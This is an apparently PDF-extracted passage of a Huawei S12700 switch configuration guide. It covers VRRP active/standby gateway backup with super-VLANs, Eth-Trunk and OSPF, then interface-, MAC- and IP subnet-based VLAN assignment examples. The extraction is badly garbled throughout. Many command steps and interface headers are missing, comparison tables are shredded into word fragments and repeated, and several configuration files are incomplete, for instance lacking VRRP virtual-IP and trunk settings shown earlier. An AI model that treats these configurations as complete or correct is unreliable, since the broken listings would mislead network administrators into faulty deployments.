VLAN 116
G E 1 /0 /3 G E 1 /0 /1
G E 1 /0 /1 G E 1 /0 /4 1 9 2 .1 6 8 .1 .2 /2 4
E th -T ru n k1
G E 1 /0 /3
...
S w itc h S w itc h C In te rn e t
1 7 2 .1 6 .1 .1 /2 4
G E 1 /0 /4 G E 1 /0 /2
G E 1 /0 /2
G E 1 /0 /3 1 9 2 .1 6 8 .2 .2 /2 4
VLAN 165~ G E 1 /0 /1
VLAN 180 G E 1 /0 /2
1 9 2 .1 6 8 .2 .1 /2 4
S w itc h B
Backup

A VRRP group in active/standby mode is used to implement gateway backup. The
configuration roadmap is as follows:
1. Assign an IP address to each interface and configure a routing protocol to ensure

network connectivity.
2. Configure VLAN aggregation on SwitchA and SwitchB to implement Layer 2 isolation
and Layer 3 connectivity of VLANs 101 to 180 and save IP addresses.
3. Create an Eth-Trunk on SwitchA and SwitchB and add member interfaces to the Eth-
Trunk to increase the link bandwidth and implement link backup.
4. Configure a VRRP group between SwitchA and SwitchB. Set a higher priority for
SwitchA so that SwitchA functions as the master to forward traffic, and set the
preemption delay to 20s on SwitchA. Set a lower priority for SwitchB so that SwitchB
functions as the backup.
5. Associate VRRP with GE1/0/1 and GE1/0/2 on SwitchA so that the VRRP group can
detect the fault of the master and perform an active/standby switchover immediately.
NOTE
SwitchA and SwitchB are core switches, and the switch is an aggregation switch.
Procedure
Step 1 Configure devices to ensure network connectivity.
# Assign an IP address to each interface on core devices. SwitchA is used as an example. The
[SwitchA] vlan batch 11 to 15 101 to 180 301 to 305 400
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 101 to 180
[SwitchA] interface vlanif 11
[SwitchA-Vlanif11] ip address 10.1.1.2 24
[SwitchA-Vlanif11] quit

# Configure Layer 2 transparent transmission on the switch.

[Switch] vlan batch 11 to 15 101 to 180
[Switch-GigabitEthernet1/0/1] undo port trunk allow-pass vlan 1
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 11 to 15 101 to 180
# Configure OSPF on SwitchA, SwitchB, and switch. SwitchA is used as an example. The
configurations of SwitchB and SwitchC are similar to the configuration of SwitchA, and are
not mentioned here. For details, see the configuration files.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit
Step 2 Configure a super-VLAN on SwitchA and SwitchB.

# Configure a super-VLAN on SwitchA. The configuration of SwitchB is similar to the
configuration of SwitchA, and is not mentioned here. For details, see the configuration files.
[SwitchA] vlan 11
[SwitchA-vlan11] aggregate-vlan
[SwitchA-vlan11] access-vlan 101 to 116 301
[SwitchA-vlan11] quit
[SwitchA] vlan 12
[SwitchA] vlan 13
[SwitchA] vlan 14
[SwitchA] vlan 15
Step 3 Configure link aggregation on the switchA and SwitchB.

# Create Eth-Trunk 1 in LACP mode on SwitchA. The configuration of SwitchB is similar to
the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.
[SwitchA-Eth-Trunk1] mode lacp
[SwitchA-Eth-Trunk1] port link-type trunk
[SwitchA-Eth-Trunk1] undo port trunk allow-pass vlan 1
[SwitchA-Eth-Trunk1] port trunk allow-pass vlan 301 to 305

# Add member interfaces on SwitchA to Eth-Trunk 1. The configuration of SwitchB is similar

to the configuration of SwitchA, and is not mentioned here. For details, see the configuration
files.
[SwitchA-GigabitEthernet1/0/3] eth-trunk 1
Step 4 Configure VRRP groups on SwitchA and SwitchB.

# Configure a VRRP group on SwitchA, and set the priority of SwitchA to 120 and the
preemption delay to 20s.
[SwitchA-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchA-Vlanif11] vrrp vrid 1 priority
120 //The default priority of the device
in a VRRP group is 100. Change the priority of the master to be higher than that
of the backup.
[SwitchA-Vlanif11] vrrp vrid 1 preempt-mode timer delay
20 //The device in a VRRP group uses the immediate
preemption mode by default. Change the preemption delay of the master to prevent
traffic interruptions when the master and backup frequently preempt the bandwith
on an unstable network.
[SwitchA-Vlanif11] vrrp vrid 1 track interface gigabitethernet 1/0/1 reduced
100 //Associate the VRRP group with the uplink interface. Set the decreased
priority to ensure that the priority of the backup is higher than the priority of
the master. Then an active/stadnby switchover can be triggered.
100 //Associate the VRRP group with the downlink interface. Set the decreased
[SwitchA-Vlanif11] vrrp advertise send-mode
301 //Specify VLAN 301 where VRRP packets
are transmitted to save the network bandwidth.
[SwitchA-Vlanif12] vrrp vrid 2 priority 120
[SwitchA-Vlanif12] vrrp vrid 2 preempt-mode timer delay 20
[SwitchA-Vlanif12] vrrp vrid 2 track interface gigabitethernet 1/0/1 reduced 100
[SwitchA-Vlanif12] vrrp advertise send-mode 302


# Configure a VRRP group on SwitchB. SwitchB uses the default priority of 100.
[SwitchB] interface vlanif 11
[SwitchB-Vlanif11] vrrp vrid 1 virtual-ip 10.1.1.1
[SwitchB-Vlanif11] vrrp advertise send-mode 301
[SwitchB-Vlanif11] quit
Step 5 Enable STP on SwitchA, SwitchB, and SwitchC.

# Disable global STP on SwitchA, SwitchB, SwitchC, and Switch. SwitchA is used as an
example. The configurations of SwitchB, SwitchC, and the switch are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] stp disable

# After the configuration is complete, run the display vrrp command on SwitchA. You can
see that SwitchA is the master in VRRP group 1. VRRP group 1 is used as an example.
Information of other VRRP groups is similar to information of VRRP group 1.
[SwitchA] display vrrp 1
Vlanif11 | Virtual Router 1
State : Master
Master IP : 10.1.1.2
Send VRRP packet to subvlan : 301
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : UP
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58
# Run the display vrrp command on SwitchB. You can see that SwitchB is the backup.
VRRP group 1 is used as an example.
[SwitchB] display vrrp 1

State : Backup
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58
# Run the shutdown command on GE1/0/1 of SwitchA to simulate a link fault. Then run the
display vrrp command on SwitchA and SwitchB. You can see that SwitchA is in Backup
state, SwitchB enters the Master state, and the associated interface becomes Down.
[SwitchA-GigabitEthernet1/0/1] shutdown
State : Backup
PriorityRun : 20
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : DOWN
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
State : Master
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:12:38
# Run the undo shutdown command on GE1/0/1 of SwitchA.


[SwitchA-GigabitEthernet1/0/1] undo shutdown
# After 20s, run the display vrrp command on SwitchA and SwitchB. You can see that
SwitchA restores to be the master and SwitchB the backup, and the associated interface is in
Up state.
State : Master
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
IF state : UP
IF state : UP
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
State : Backup
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 14:17:36
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 11 to 15 101 to 180 301 to 305 400
#
stp disable
#
vlan 11
aggregate-vlan
access-vlan 101 to 116 301
vlan 12
aggregate-vlan


vlan 13
aggregate-vlan
vlan 14
aggregate-vlan
vlan 15
aggregate-vlan
#
interface Vlanif11
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 track interface gigabitethernet1/0/1 reduced 100
vrrp advertise send-mode 301
#
interface Vlanif12
ip address 10.1.2.2 255.255.255.0
#
interface Vlanif13
ip address 10.1.3.2 255.255.255.0
#
interface Vlanif14
ip address 10.1.4.2 255.255.255.0
#
interface Vlanif15
ip address 10.1.5.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.1 255.255.255.0
#
mode lacp
#

#
#
eth-trunk 1
#
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.1.0 0.0.0.255
#
return
#
sysname SwitchB
#
vlan batch 11 to 15 101 to 180 200 301 to 305
#
stp disable
#
vlan 11
aggregate-vlan
vlan 12
aggregate-vlan
vlan 13
aggregate-vlan
vlan 14
aggregate-vlan
vlan 15
aggregate-vlan
#
interface Vlanif11
ip address 10.1.1.3 255.255.255.0
#
interface Vlanif12
ip address 10.1.2.3 255.255.255.0
#
interface Vlanif13
ip address 10.1.3.3 255.255.255.0
#
interface Vlanif14
ip address 10.1.4.3 255.255.255.0
#
interface Vlanif15
ip address 10.1.5.3 255.255.255.0


#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
#
mode lacp
#
#
#
eth-trunk 1
#
eth-trunk 1
#
ospf 1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
network 10.1.5.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
#
stp disable
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif300
ip address 172.16.1.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.1.2 255.255.255.0
#
#
#
#

ospf 1
area 0.0.0.0
network 172.16.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of the switch

#
sysname Switch
#
vlan batch 11 to 15 101 to 180
#
stp disable
#
port trunk allow-pass vlan 11 to 15 101 to 180
#
#
return
6.3 Typical VLAN Configuration
6.3.1 Example for Configuring Interface-based VLAN Assignment
Interface-based VLAN Assignment Overview

VLANs can be assigned based on interfaces, MAC addresses, IP subnets, protocols, and
policies (MAC addresses, IP addresses, and interfaces). Table 6-2 compares different VLAN
assignment modes.
Table 6-2 Comparisons among VLAN assignment modes

VLAN Implementation Advantage Disadvan Usage
Assignme tage Scenario
nt Mode
Interface- VLANs are assigned based It is simple to The Applies to

based on interfaces. define VLAN network networks
VLAN A network administrator members. administrat of any
assignment preconfigures a PVID for or needs to scale and
each interface on a switch. reconfigure with
When an untagged frame VLANs devices at
arrives at an interface, the when fixed
switch adds the PVID of VLAN locations.
the interface to the frame. members
The frame is then change.
transmitted in the VLAN
specified by the PVID.


nt Mode
MAC VLANs are assigned based When physical The Applies to

address- on source MAC addresses locations of users network small-scale
based of frames. change, the administrat networks
VLAN A network administrator network or must where user
assignment preconfigures mappings administrator predefine terminals
between MAC addresses does not need to VLANs for often
and VLAN IDs. When reconfigure all change
receiving an untagged VLANs for the members physical
frame, the switch adds the users. This on a locations
VLAN tag mapping the improves security network. but their
MAC address of the frame and access NICs
to the frame. Then the flexibility on a seldom
frame is transmitted in the network. change, for
specified VLAN. example,
mobile
computers.


nt Mode
IP subnet- VLANs are assigned based l When physical Users are Applies to
based on source IP addresses and locations of distributed scenarios
VLAN subnet masks. users change, regularly where there
assignment A network administrator the network and are high
preconfigures mappings administrator multiple requiremen
between IP addresses and does not need users are ts for
VLAN IDs. When to reconfigure on the mobility
receiving an untagged VLANs for the same and
frame, the switch adds the users. network simplified
VLAN tag mapping the IP l This mode segment. manageme
address of the frame to the reduces nt and low
frame. Then the frame is communicatio requiremen
transmitted in the specified n traffic and ts for
VLAN. allows a security.
broadcast For
domain to example,
span multiple this mode
switches. can be used
if a PC
with
multiple IP
addresses
needs to
access
servers on
different
network
segments
or a PC
needs to
join a new
VLAN
automatical
ly after the
PC's IP
address
changes.


nt Mode
Protocol- VLANs are assigned based This mode binds l The Applies to
based on protocol (suite) types service types to network networks
VLAN and encapsulation formats VLANs, adminis using
assignment of frames. facilitating trator multiple
A network administrator management and must protocols.
preconfigures mappings maintenance. preconfi
between protocol types and gure
VLAN IDs. When mappin
receiving an untagged gs
frame, the switch adds the between
VLAN tag mapping the all
protocol type of the frame protocol
to the frame. The frame is types
then transmitted in the and
specified VLAN. VLAN
IDs.
l The
switch
needs to
analyze
protocol
address
formats
and
convert
the
formats,
which
consum
es
excessi
ve
resourc
es.
Therefo
re, this
mode
slows
down
switch
respons
e time.


nt Mode
Policy- VLANs are assigned based l This mode Each Applies to

based on policies such as provides high policy complex
VLAN combinations of interfaces, security. MAC needs to be networks.
assignment MAC addresses, and IP addresses or IP manually
(MAC addresses. addresses of configured.
addresses, A network administrator users that have
IP preconfigures policies. been bound to
addresses, When receiving an VLANs
and untagged frame that cannot be
interfaces) matches a configured changed.
policy, the switch adds a l The network
specified VLAN tag to the administrator
frame. The frame is then can flexibly
transmitted in the specified select which
VLAN. policies to use
according to
the
management
mode and
requirements.
Interface-based VLAN assignment is the simplest and most commonly used method.
Configuration Notes
This example applies to all versions of the S12700.
As shown in Figure 6-8, the switch of an enterprise connects to many users, and users
accessing the same service connect to the enterprise network through different devices. To
ensure communication security and prevent broadcast storms, the enterprise requires that
users using the same service communicate with each other and users accessing different
services be isolated. You can configure interface-based VLAN assignment on the switch so
that the switch adds interfaces connected to users using the same service to the same VLAN.
Users in different VLANs cannot communicate with each other at Layer 2, and users in the
same VLAN can communicate with each other.

Figure 6-8 Networking of interface-based VLAN assignment
GE1/0/3 GE1/0/3
SwitchA SwitchB
GE1/0/1 GE1/0/2 GE1/0/1 GE1/0/2
User1 User3 User2 User4

VLAN 2 VLAN 3 VLAN 2 VLAN 3
1. Create VLANs and add interfaces that connect users to VLANs to isolate Layer 2 traffic
of different services.
2. Configure link types of interfaces between SwitchA and SwitchB and VLANs allowed
by interfaces so that users accessing the same service can communicate with each other
through SwitchA and SwitchB.
Procedure
Step 1 Create VLAN 2 and VLAN 3 on SwitchA and add interfaces that are connected to users to
VLANs. The configuration of SwitchB is similar to the configuration of SwitchA, and is not
mentioned here.
[SwitchA] vlan batch 2 3 //Create VLAN 2 and VLAN 3 in a batch.
[SwitchA-GigabitEthernet1/0/1] port link-type access //The interface connected
to the access device must be the access interface. The default link type of an
interface is not access, so you need to manually configure the access interface.
[SwitchA-GigabitEthernet1/0/1] port default vlan 2 //Add GE1/0/1 to VLAN 2.
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 3 //Add GE1/0/2 to VLAN 3.
Step 2 Configure the link type of the interface on SwitchA that is connected to SwitchB and VLAN
allowed by the interface. The configuration of SwitchB is similar to the configuration of
SwitchA, and is not mentioned here.

[SwitchA-GigabitEthernet1/0/3] port link-type trunk //The link type of
interfaces connecting switches must be trunk. The default link type of an
interface is not trunk, so you need to manually configure the trunk interface.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 2 3 //Add GE1/0/3 to
VLAN 2 and VLAN 3.
User1 and User2 are on the same network segment, for example, 192.168.100.0/24; User3 and
User4 are on the same network segment, for example, 192.168.200.0/24.

User1 and User2 can ping each other, but cannot ping User3 or User4. User3 and User4 can
ping each other, but cannot ping User1 or User2.
----End
Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 3
#
port default vlan 2
#
port default vlan 3
#
#
return
Configuration file of SwitchB

#
sysname SwitchB
#
vlan batch 2 to 3
#
port default vlan 2
#
port default vlan 3
#
#
return
Related Content
Support Community
l VLAN Basics
l VLAN Assignment
Videos
l Configuring Interface-based VLAN Assignment

l Configuring Interface-based VLAN Assignment(FAQ)
l Deploying a Layer 2 Switch on a LAN


(Access Device Used as the Gateway)
Overview
policies (MAC addresses, IP addresses, and interfaces). Interface-based VLAN assignment is
the simplest and commonly used.
Interface-based VLAN assignment indicates that VLANs are assigned based on interfaces. A
network administrator preconfigures a PVID for each interface on a switch. When an
untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame.
Then the frame is transmitted in a specified VLAN.
In typical hierarchical networking, when the access switch is a Layer 3 switch, the access
switch can be used as the gateway of PCs to simplify the configuration of the aggregation
switch.
Configuration Notes
his example applies to all versions of the S12700.
As shown in Figure 6-9, PC1 and PC2 belong to VLAN 2 and VLAN 3, respectively. PC1
and PC2 connect to the aggregation switch SW1 through the access switch SW2. PC3 belongs
to VLAN 4 and connects to SW1 through SW3. SW2 functions as the gateway of PC1 and
PC2, and SW3 is used as the gateway of PC3. Static routes are configured on switches so that
PCs can communicate with each other and can be connected to the router.
Figure 6-9 Configuring access devices as gateways
GE1/0/1
SW1
GE1/0/2 GE1/0/3
GE1/0/1 GE1/0/1
Gateway of
SW2 SW3
PCs
GE1/0/23 GE1/0/24 GE1/0/2
PC1: VLAN 2 PC2: VLAN 3 PC3: VLAN 4

IP address: IP address: IP address:
192.168.2.2/24 192.168.3.2/24 192.168.4.2/24
Gateway address: Gateway address: Gateway address:
192.168.2.1 192.168.3.1 192.168.4.1

1. Configure interface-based assignment on the access switch to implement Layer 2
interworking.
2. Configure access switches as gateways of PCs to implement communication between
PCs on different network segments.
3. Configure static routes on the aggregation switch so that PCs can communicate with the
router.
Procedure
Step 1 Configure SW2.
# Create VLANs.
[HUAWEI] sysname SW2 //Change the device name to SW2 for easy identification.
[SW2] vlan batch 2 to 3 //Create VLAN 2 and VLAN 3 in a batch.
# Add interfaces to VLANs.

[SW2] interface gigabitethernet 1/0/23
[SW2-GigabitEthernet1/0/23] port link-type access //Configure the interface
connected to the PC as the access interface.
[SW2-GigabitEthernet1/0/23] port default vlan 2 //Add PC1 to VLAN 2.
[SW2-GigabitEthernet1/0/23] quit
[SW2-GigabitEthernet1/0/24] port link-type access
# Configure VLANIF interfaces and configure IP addresses for VLANIF interfaces as

gateway addresses of PCs.
[SW2] interface vlanif 2 //Create VLANIF 2.
[SW2-Vlanif2] ip address 192.168.2.1 24 //Configure an IP address for VLANIF 2.
The IP address is the gateway address of PC1.
[SW2-Vlanif2] quit
[SW2-Vlanif3] quit
# Connect SW2 to SW1.

[SW2] vlan batch 5 //Create VLAN 5.
[SW2-GigabitEthernet1/0/1] port default vlan 5 //Configure SW2 and SW1 to
communicate in untagged mode.
The IP address is the IP address of the interconnected interface between SW1 and
SW2.
[SW2-Vlanif5] quit
[SW2] ip route-static 0.0.0.0 0.0.0.0 192.168.5.1 //Configure a default route so
that the PC can access the router. The next hop address is the IP address of the
interface connected to SW1.

# Create VLANs.

[HUAWEI] sysname SW3 //Change the device name to SW3.


[SW3-Vlanif4] quit
# Connect SW3 to SW1.

[SW3-GigabitEthernet1/0/1] port default vlan 5 //Configure SW3 and SW1 to
communicate in untagged mode.
The IP address is the IP address of interconnected interface between SW3 and SW1.
[SW3-Vlanif5] quit
[SW3] ip route-static 0.0.0.0 0.0.0.0 192.168.5.1 //Configure a default route so
that the PC can access the router. The next hop address is the IP address of the
interface connected to SW1.
# Create VLANs.
# Add interfaces connected to PCs to VLANs.

connected to the router as the access interface.
[SW1-GigabitEthernet1/0/1] port default vlan 5
connected to SW2 as the access interface.
connected to SW3 as the access interface.
# Configure VLANIF interfaces so that PCs can connect to the router.

The IP address is the IP address of the interface connected to the router.
[SW1-Vlanif5] quit

# Configure a static route so that PCs on different network segments can communicate with
each other.
[SW1] ip route-static 192.168.2.0 255.255.255.0 192.168.5.2 //Configure a static
route. Packets with the destination IP address of 192.168.2.0/24 are forwarded to
the next hop address of 192.168.5.2. The next hop address is the IP address of
the VLANIF interface connected to SW2.
# Configure a default route so that PCs can communicate with the router.
[SW1] ip route-static 0.0.0.0 0.0.0.0 192.168.5.4 //The IP address is the IP
address of the interface connected to SW1.

PC1, PC2, and PC3 can access each other, and they can communicate with the router.
----End
Configuration Files
Configuration file of SW1
#
sysname SW1
#
vlan batch 5
#
interface Vlanif5
ip address 192.168.5.1 255.255.255.0
#
port default vlan 5
#
port default vlan 5
#
port default vlan 5
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.4
ip route-static 192.168.2.0 255.255.255.0 192.168.5.2
ip route-static 192.168.3.0 255.255.255.0 192.168.5.2
ip route-static 192.168.4.0 255.255.255.0 192.168.5.3
#
return

#
sysname SW2
#
vlan batch 2 to 3 5
#
#
interface Vlanif2
ip address 192.168.2.1 255.255.255.0

#
interface Vlanif3
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.2 255.255.255.0
#
port default vlan 5
#
port default vlan 2
#
port default vlan 3
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.1
#
return

#
sysname SW3
#
vlan batch 4 to 5
#
interface Vlanif4
ip address 192.168.4.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.3 255.255.255.0
#
port default vlan 5
#
port default vlan 4
#
ip route-static 0.0.0.0 0.0.0.0 192.168.5.1
#
return

(Aggregation Device Used as the Gateway)
Overview
policies (MAC addresses, IP addresses, and interfaces). Interface-based VLAN assignment is
the simplest and commonly used.
Interface-based VLAN assignment indicates that VLANs are assigned based on interfaces. A
network administrator preconfigures a PVID for each interface on a switch. When an
untagged frame arrives at an interface, the switch adds the PVID of the interface to the frame.
Then the frame is transmitted in a specified VLAN.
In typical hierarchical networking, when the access switch is a Layer 2 switch, the
aggregation switch can be used as the gateway of PCs. The configuration of the access switch

is simplified, and PCs access the external network through one outbound interface, thereby
facilitating maintenance and management.
Configuration Notes
As shown in Figure 6-10, PC1 and PC2 belong to VLAN 2 and VLAN 3, respectively. PC1
and PC2 connect to the aggregation switch SW1 through the access switch SW2. PC3 belongs
to VLAN 4 and connects to SW1 through SW3. No configuration is performed on SW3, and
SW3 functions as the hub and is plug-and-play. SW1 functions as the gateway of PC1, PC2,
and PC3 so that PCs can communicate with each other and can be connected to the router.
Figure 6-10 Configuring the aggregation device as the gateway
GE1/0/1 Gateway of PCs

SW1
GE1/0/2 GE1/0/3
GE1/0/1
SW2 SW3
GE1/0/23 GE1/0/24
PC1: VLAN 2 PC2: VLAN 3 PC3: VLAN 4

IP address: IP address: IP address:
192.168.2.2/24 192.168.3.2/24 192.168.4.2/24
Gateway address: Gateway address: Gateway address:
192.168.2.1 192.168.3.1 192.168.4.1
1. Configure interface-based assignment on the access switch to implement Layer 2
interworking.
2. Configure the aggregation switch as the gateway of PCs to implement Layer 3
interworking between PCs on different network segments.
3. Configure the interface connecting the aggregation switch and router.
Procedure
# Create VLANs.

[HUAWEI] sysname SW2 //Change the device name to SW2 for easy identification.
[SW2] vlan batch 2 3 //Create VLAN 2 and VLAN 3 in a batch.

[SW2-GigabitEthernet1/0/1] port link-type trunk //Configure the interface
connected to the aggregation switch as the trunk interface.
[SW2-GigabitEthernet1/0/1] port trunk allow-pass vlan 2 3 //Add the interface to
VLAN 2 and VLAN 3.

# Create VLANs.
[SW1] vlan batch 2 to 5 //Create VLANs 2 to 5.
# Add interfaces connected to PCs to VLANs.

[SW1-GigabitEthernet1/0/2] port link-type trunk //Configure the interface
connected to SW1 as the trunk interface.
[SW1-GigabitEthernet1/0/2] port trunk allow-pass vlan 2 3 //Add the interface to
VLAN 2 and VLAN 3.
connected to PC3 as the access interface.

[SW1-Vlanif2] quit
[SW1-Vlanif3] quit
[SW1-Vlanif4] quit
# Add interfaces connected to routers to VLANs.

connected to the router as the access interface. The interface communicate with
the router in untagged mode.
[SW1-GigabitEthernet1/0/1] port default vlan 5 //Add the router to VLAN 5.
# Configure VLANIF interfaces so that PCs can connect to the router.


The IP address is used for interconnection with the router.
[SW1-Vlanif5] quit
PC1, PC2, and PC3 can access each other, and they can communicate with the router.
----End
Configuration Files
#
sysname SW1
#
vlan batch 2 to 5
#
interface Vlanif2
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif3
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif4
ip address 192.168.4.1 255.255.255.0
#
interface Vlanif5
ip address 192.168.5.1 255.255.255.0
#
port default vlan 5
#
#
port default vlan 4
#
return

#
sysname SW2
#
vlan batch 2 to 3
#
#
port default vlan 2
#
port default vlan 3
#
return

6.3.4 Example for Configuring MAC Address-based VLAN

Assignment
Overview of MAC Address-based VLAN Assignment
MAC address-based VLAN assignment applies to small-scale networks where user terminals
often change physical locations but their NICs seldom change, for example, mobile
computers.
assignment modes.

nt Mode


mobile
computers.


nt Mode
broadcast For
domain to example,
if a PC
with
multiple IP
addresses
needs to
access
servers on
different
network
segments
or a PC
needs to
join a new
VLAN
automatical
ly after the
PC's IP
address
changes.


nt Mode
IDs.
l The
switch
needs to
analyze
protocol
address
formats
and
convert
the
formats,
which
consum
es
excessi
ve
resourc
es.
Therefo
re, this
mode
slows
down
switch
respons
e time.


nt Mode

according to
the
management
mode and
requirements.
Configuration Notes
As shown in Figure 6-11, GE1/0/1 interfaces on SwitchA and SwitchB connect to two
conference rooms, respectively. Laptop1 and Laptop2 are portal computers used in the two
conferences rooms. Laptop1 and Laptop2 belong to two departments, which belong to VLAN
100 and VLAN 200, respectively. Regardless of which conference room in which Laptop1
and Laptop2 are used, Laptop1 and Laptop2 are required to access the servers of their
respective departments (Server1 and Server2, respectively). The MAC addresses of Laptop1
and Laptop2 are 0001-00ef-00c0 and 0001-00ef-00c1.

Figure 6-11 Networking of MAC address-based VLAN assignment

Server2
Server1
VLAN 100 VLAN 200
Switch
GE1/0/2 GE1/0/1
GE1/0/3 GE1/0/4
GE1/0/2 GE1/0/2
SwitchA SwitchB
GE1/0/1 GE1/0/1
Laptop1 Laptop2
1. Create VLANs on SwitchA and SwitchB and add interfaces to VLANs to implement
Layer 2 connectivity.
2. Configure MAC address-based VLAN assignment on SwitchA and SwitchB.
3. Configure transparent transmission of VLAN tagged-packets on the switch so that
Laptop1 and Laptop2 can access Server1 and Server2 of their respective departments.
Procedure
Step 1 Configure SwitchA. The configuration of SwitchB is similar to the configuration of SwitchA,
and is not mentioned here.
[SwitchA] vlan batch 100 200 //Create VLAN 100 and VLAN 200.
[SwitchA-GigabitEthernet1/0/2] port link-type trunk //The link type of
interfaces connecting switches must be trunk. The default link type of an
interface is not trunk, so you need to manually configure the trunk interface.
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 100 200 //Add GE1/0/2
to VLAN 100 and VLAN 200.
[SwitchA] vlan 100
[SwitchA-vlan100] mac-vlan mac-address 0001-00ef-00c0 //Packets with the MAC
address of 0001-00ef-00c0 are transmitted in VLAN 100.
[SwitchA] vlan 200
[SwitchA-vlan200] mac-vlan mac-address 0001-00ef-00c1 //Packets with the MAC
address of 0001-00ef-00c1 are transmitted in VLAN 200.
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid //MAC address-based VLAN

assignment can only be enabled on hybrid interfaces. The default link type of an
interface is not hybrid, so you need to manually configure the hybrid interface.
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100 200 //Add the
interface to VLAN 100 and VLAN 200 in untagged mode.
[SwitchA-GigabitEthernet1/0/1] mac-vlan enable //Enable MAC address-based VLAN
assignment on the interface.
Step 2 Configure the switch. The configurations of GE1/0/2, GE1/0/3, and GE1/0/4 are similar to the
configuration of GE1/0/1, and are not mentioned here.
[Switch] vlan batch 100 200
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 100 200 //Add GE1/0/1
to VLAN 100 and VLAN 200.

# Run the display mac-vlan mac-address all command in any view to check the
configuration of MAC address-based VLAN assignment.
[SwitchA] display mac-vlan mac-address all
---------------------------------------------------
MAC Address MASK VLAN Priority
---------------------------------------------------
0001-00ef-00c0 ffff-ffff-ffff 100 0
0001-00ef-00c1 ffff-ffff-ffff 200 0
Total MAC VLAN address count: 2
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100 200
#
port hybrid untagged vlan 100 200
mac-vlan enable
#
#
vlan 100
mac-vlan mac-address 0001-00ef-00c0 priority 0
vlan 200
#
return

#
sysname SwitchB
#
vlan batch 100 200
#

mac-vlan enable
#
#
vlan 100
vlan 200
#
return

#
sysname Switch
#
vlan batch 100 200
#
#
#
#
#
return
6.3.5 Example for Configuring IP Subnet-based VLAN

Assignment
Overview of IP Subnet-based VLAN Assignment
IP subnet-based VLAN assignment applies to scenarios where there are high requirements for
mobility and simplified management and low requirements for security. For example, this
mode can be used if a PC with multiple IP addresses needs to access servers on different
network segments or a PC needs to join a new VLAN automatically after the PC's IP address
changes.
assignment modes.


nt Mode


mobile
computers.


nt Mode
broadcast For
domain to example,
if a PC
with
multiple IP
addresses
needs to
access
servers on
different
network
segments
or a PC
needs to
join a new
VLAN
automatical
ly after the
PC's IP
address
changes.


nt Mode
IDs.
l The
switch
needs to
analyze
protocol
address
formats
and
convert
the
formats,
which
consum
es
excessi
ve
resourc
es.
Therefo
re, this
mode
slows
down
switch
respons
e time.


nt Mode

according to
the
management
mode and
requirements.
Configuration Notes
As shown in Figure 6-12, an enterprise has multiple services, including IPTV, VoIP, and
Internet access. Each service uses a different IP subnet. To facilitate management, the
company requires that packets of the same service be transmitted in the same VLAN and
packets of different services in different VLANs. The switch receives packets of multiple
services such as data, IPTV, and voice services, and user devices of these services use IP
addresses on different IP subnets. The switch needs to assign VLANs to packets of different
services so that the router can transmit packets with different VLAN IDs to different servers.

Figure 6-12 Networking of IP subnet-based VLAN assignment

IP T V
s e rv e r
R o u te r
G E 1 /0 /1
G E 1 /0 /2
